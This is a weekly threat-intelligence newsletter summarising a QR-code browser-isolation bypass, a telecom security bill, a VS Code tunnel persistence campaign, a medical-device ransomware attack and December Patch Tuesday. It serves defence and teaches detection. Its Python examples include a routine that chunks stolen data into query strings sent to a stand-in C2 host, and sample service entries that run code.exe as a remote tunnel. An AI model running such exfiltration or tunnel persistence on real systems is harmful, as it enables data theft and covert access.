Written by
Team Nucleus
Written on
13th December, 2024
Analyst Insight
This week highlights the increased focus by threat actors on mobile devices and on the telecommunications systems behind them. QR codes are being used to bypass isolated browsers in a proof-of-concept demonstrated by Mandiant. QR codes have been scrutinised by many security researchers, including ourselves, over the last year for one inherent trait: they are not human readable. Microsoft's December Patch Tuesday brings a wealth of fixes to its products, with 17 Critical vulnerabilities among those addressed. The troubling trend of healthcare providers and researchers being targeted by threat actors continues, with Artivion, a leading manufacturer of cardiac implants, disclosing a breach this week.
QR Codes Proven To Be Viable Vehicles For Complex Attacks
Readers of Telesoft's Cyber Report may remember that two months ago one of our analysts raised concerns about QR codes, questioning whether their convenience was worth the risk. Researchers at Mandiant have now shown that the danger goes beyond phishing and deception, publishing proof-of-concept methods that bypass all three types of browser isolation (remote, on-premises and local). Browser isolation is a widely deployed control: the page is rendered in a separate, sandboxed browser so that any malicious payload or script executes there rather than on the endpoint, and only the visual appearance of the page, a stream of pixels, is sent back to the user's browser. That is exactly the gap a QR code slips through. Because the pixel stream is passed on untouched, a QR code embedded in an attacker-controlled page arrives on the endpoint intact; malware already running on the host screenshots the rendered page, decodes the QR code and receives its command, while the isolated browser never sees anything but an image. Data going the other way is pushed out in ordinary web requests, which isolation forwards to the remote browser as designed.
While this is a far more technical attack chain than simply obscuring the end link, it once again proves that QR codes may need to be taken with a new dose of scrutiny.
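The request-side half of that channel is the part a defender can see in proxy logs, so the following added example (our own illustration, not Mandiant's proof of concept and not code from the original article) models an implant pushing chunked data out through the isolation proxy as URL query values and then runs a detector over a constructed log. The hostname, log format, chunk size and beacon interval are all assumptions; the detector looks for the pattern such a channel cannot avoid: many requests from one client to one host, each carrying a long, high-entropy query value, at a steady cadence.

```python
"""Upstream half of a C2 channel that rides through browser isolation, plus a
detector for it.  Added example: not Mandiant's proof of concept and not code
from the article.  Hostnames, the log format, the chunk size and the beacon
interval are all assumptions; the log lines are constructed in build_sample_log().
"""
import base64
import math
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

C2_HOST = "c2.example.invalid"   # assumed attacker host
CHUNK = 24                       # payload bytes per request (assumption)

# Assumed proxy log line: "<iso-ts> <client-ip> GET <url> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) GET https?://([^/\s]+)(/[^?\s]*)?(?:\?(\S*))? (\d{3})$")


def implant_requests(payload: bytes, start: datetime, interval_s: int = 5):
    """Isolation forwards every navigation the endpoint asks for, so the implant
    pushes data out by chunking it into base64url query values, one GET per
    chunk, at a fixed cadence."""
    urls = []
    for n, i in enumerate(range(0, len(payload), CHUNK)):
        enc = base64.urlsafe_b64encode(payload[i:i + CHUNK]).decode().rstrip("=")
        urls.append((start + timedelta(seconds=n * interval_s), f"https://{C2_HOST}/u?d={enc}"))
    return urls


def shannon_entropy(s: str) -> float:
    """Bits per character; base64 blobs sit around 4-5, human-readable queries lower."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line: str):
    """(timestamp, client, host, query) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, client, host, _path, query, _status = m.groups()
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), client, host, query or ""


def find_beacons(log_lines, min_hits=4, min_len=20, min_entropy=3.5, max_jitter_s=2.0):
    """Group requests by (client, host) and flag pairs that show the exfil
    pattern: enough hits, long high-entropy query strings, regular spacing."""
    groups = defaultdict(list)
    for line in log_lines:
        parsed = parse_line(line)
        if parsed:
            ts, client, host, query = parsed
            groups[(client, host)].append((ts, query))
    flagged = {}
    for key, reqs in groups.items():
        if len(reqs) < max(min_hits, 2):
            continue
        reqs.sort()
        queries = [q for _, q in reqs]
        mean_len = sum(map(len, queries)) / len(queries)
        mean_ent = sum(map(shannon_entropy, queries)) / len(queries)
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(reqs, reqs[1:])]
        mean_gap = sum(gaps) / len(gaps)
        jitter = math.sqrt(sum((g - mean_gap) ** 2 for g in gaps) / len(gaps))
        if mean_len >= min_len and mean_ent >= min_entropy and jitter <= max_jitter_s:
            flagged[key] = {"hits": len(reqs), "mean_len": round(mean_len, 1),
                            "mean_entropy": round(mean_ent, 2), "interval_s": round(mean_gap, 1)}
    return flagged


def build_sample_log():
    """Constructed proxy log: one exfil session interleaved with ordinary browsing."""
    t0 = datetime(2024, 12, 10, 10, 0, tzinfo=timezone.utc)
    stolen = (b"Constructed sample of the bytes an implant would chunk and push out "
              b"through the isolation proxy as URL parameters.")
    lines = [f"{ts.strftime('%Y-%m-%dT%H:%M:%SZ')} 10.0.0.5 GET {url} 200"
             for ts, url in implant_requests(stolen, t0)]
    lines += [
        "2024-12-10T10:00:03Z 10.0.0.5 GET https://www.example.com/news/article?id=42 200",
        "2024-12-10T10:07:11Z 10.0.0.5 GET https://www.example.com/about 200",
        "2024-12-10T10:09:30Z 10.0.0.5 GET https://www.example.com/search?q=quarterly+report 200",
    ]
    return lines


if __name__ == "__main__":
    for key, summary in find_beacons(build_sample_log()).items():
        print(key, summary)
```

Run as-is it flags the (10.0.0.5, c2.example.invalid) pair and nothing else; the thresholds are deliberately loose starting points, and in a real deployment the interesting tuning knob is the jitter bound, since a careful implant will randomise its interval and the query length and entropy tests then have to carry the detection on their own.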
Wyden Proposes New Bill to Secure U.S. Telecoms Networks After Major Hack
Following the "Salt Typhoon" breaches, Senator Ron Wyden has proposed the Secure American Communications Act to strengthen the security of American wireless and phone networks. The bill would require the Federal Communications Commission (FCC) to enforce binding telecom security regulations rather than leave the carriers to police themselves. Wyden criticised the FCC for allowing telecom firms to establish their own cybersecurity guidelines, a decision he blames for the significant breaches that followed: "It was inevitable that foreign hackers would burrow deep into the American communications system the moment the FCC decided to let phone companies write their own cybersecurity rules." "Telecom companies and federal regulators were asleep on the job," Wyden stated. The bill also seeks to safeguard government communications and to restrict the export of Americans' personal information.
European IT Companies targeted by "Operation Digital Eye"
Researchers from SentinelLabs have identified a campaign, dubbed "Operation Digital Eye", that ran for roughly three weeks through late June and July against IT service providers in Europe. The attackers used Microsoft infrastructure and tooling, notably Azure and Visual Studio Code, to blend their traffic in with legitimate developer activity. Initial access was gained through SQL injection against internet-facing database servers; from there further exploitation and access followed. The persistence mechanism is the notable part: a portable copy of Visual Studio Code, whose binary is simply named "code.exe" and carries a valid Microsoft signature, was dropped on compromised hosts and registered as a Windows service using the open-source Windows Service Wrapper (WinSW), then used to open a Visual Studio Code remote tunnel, giving the attackers a Microsoft-signed backdoor whose traffic terminates on Microsoft's own infrastructure.
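That chain leaves a footprint in the System event log: every new service produces a 7045 (service installed) record, and a WinSW-wrapped service looks harmless there because the record only names the wrapper binary, while the real target is in the wrapper's XML sidecar. The following added example (our own hunt logic, not code from the article or from SentinelLabs) walks that footprint: it scores 7045 records for a code.exe service binary, for tunnel arguments and for binaries in user-writable directories, and follows a WinSW sidecar through to what it actually launches. The service names, paths and event values are constructed; the 7045 field names and the WinSW sidecar layout (a <service> root with <executable> and <arguments> children) are real.

```python
"""Hunt for the persistence tradecraft described above: a Microsoft-signed
Visual Studio Code binary (code.exe) registered as a Windows service through
the Windows Service Wrapper (WinSW) to keep a remote tunnel alive.
Added example, not code from the article or from SentinelLabs.  Input is a
constructed list of System-log event 7045 (service installed) records; the
field names follow the real event, every value is made up.  WinSW's XML
sidecar layout (<service><executable/><arguments/></service>) is real."""
import re
import xml.etree.ElementTree as ET

# Directories a normal VS Code install lives in (lower-cased, backslash paths)
NORMAL_VSCODE_DIRS = (
    "\\program files\\microsoft vs code\\",
    "\\program files (x86)\\microsoft vs code\\",
    "\\appdata\\local\\programs\\microsoft vs code\\",
)
# Locations a service binary has no business living in
WRITABLE_DIRS = ("\\users\\public\\", "\\programdata\\", "\\temp\\", "\\windows\\tasks\\")


def split_image_path(image_path: str):
    """Split a service ImagePath into (executable, arguments), honouring quotes."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end], s[end + 1:].strip()
    m = re.match(r"(\S+\.exe)(.*)$", s, re.IGNORECASE)
    if m:
        return m.group(1), m.group(2).strip()
    parts = s.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def assess(exe: str, args: str):
    """Reasons a launched (exe, args) pair deserves attention; empty when benign."""
    exe_l, args_l = exe.lower(), args.lower()
    reasons = []
    if exe_l.endswith("\\code.exe") or exe_l == "code.exe":
        reasons.append("service binary is code.exe")
        if not any(d in exe_l for d in NORMAL_VSCODE_DIRS):
            reasons.append("code.exe outside a standard VS Code install directory")
    if re.search(r"\btunnel\b", args_l):
        reasons.append("arguments start a VS Code remote tunnel")
    if any(d in exe_l for d in WRITABLE_DIRS):
        reasons.append("binary lives in a user-writable directory")
    return reasons


def winsw_target(xml_text: str):
    """What a WinSW sidecar really launches: its <executable> and <arguments>."""
    root = ET.fromstring(xml_text)
    return (root.findtext("executable", default="").strip(),
            root.findtext("arguments", default="").strip())


def hunt(events, sidecars=None):
    """{ServiceName: [reasons]} over 7045 events.  sidecars maps a ServiceName to
    the WinSW XML pulled from disk; a wrapper's own ImagePath looks innocent, the
    sidecar is where code.exe and the tunnel arguments hide."""
    sidecars = sidecars or {}
    findings = {}
    for ev in events:
        exe, args = split_image_path(ev["ImagePath"])
        reasons = assess(exe, args)
        if ev["ServiceName"] in sidecars:
            wexe, wargs = winsw_target(sidecars[ev["ServiceName"]])
            reasons += ["via WinSW sidecar: " + r for r in assess(wexe, wargs)]
        if reasons:
            findings[ev["ServiceName"]] = reasons
    return findings


# Constructed 7045 records: two planted services, then two benign ones.
SAMPLE_7045 = [
    {"ServiceName": "UpdaterSvc", "StartType": "auto start", "AccountName": "LocalSystem",
     "ImagePath": r'"C:\Users\Public\svc\code.exe" tunnel --accept-server-license-terms --name host01'},
    {"ServiceName": "WinSvcWrap", "StartType": "auto start", "AccountName": "LocalSystem",
     "ImagePath": r"C:\ProgramData\winsw\WinSvcWrap.exe"},
    {"ServiceName": "BenignHostSvc", "StartType": "auto start", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"ServiceName": "VendorAgent", "StartType": "auto start", "AccountName": "LocalSystem",
     "ImagePath": r'"C:\Program Files\Example Vendor\agent.exe" --service'},
]

# Constructed WinSW sidecar (WinSvcWrap.xml) sitting next to the wrapper above.
SAMPLE_WINSW_XML = r"""<service>
  <id>WinSvcWrap</id>
  <name>WinSvcWrap</name>
  <executable>C:\ProgramData\winsw\code.exe</executable>
  <arguments>tunnel --accept-server-license-terms --name host01</arguments>
</service>"""

if __name__ == "__main__":
    for name, reasons in hunt(SAMPLE_7045, {"WinSvcWrap": SAMPLE_WINSW_XML}).items():
        print(name, "->", "; ".join(reasons))
```

The wrapper case is the one to note: on its own, WinSvcWrap only trips the writable-directory heuristic, which is why a responder who sees a service binary in ProgramData or Users\Public should pull the XML sitting next to it before closing the alert. A valid Microsoft signature on code.exe is not evidence of legitimacy here; the binary is genuine, its placement and arguments are what give the intrusion away.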
US Medical Device Manufacturer Artivion Hit by Ransomware
Artivion, a leading manufacturer of cardiac implants and devices, disclosed this week that it fell victim to a ransomware attack on the 21st of November. In an SEC Form 8-K the company told investors that the incident has not had a material impact on its finances or operations and that it will “continue to provide its products and services to customers”, with the only disruption being to “some order and shipping processes.” Artivion took some systems offline after discovering the breach; it has not said how many files were encrypted or stolen by the attackers.
December Patch Tuesday: Microsoft Releases Fixes for 72 Security Flaws
This December's Microsoft patch release addresses 72 flaws: 17 rated Critical and 54 rated Important. One of them has been confirmed as exploited in the wild. CVE-2024-49138 is an elevation-of-privilege vulnerability in the Windows Common Log File System (CLFS) driver, which lets an attacker who already has code execution on a host gain SYSTEM privileges. The US CISA has added the CVE to its Known Exploited Vulnerabilities (KEV) Catalog, which sets a remediation deadline for federal agencies. As always, patch your vulnerable systems as per vendor advice, prioritising the exploited CLFS flaw.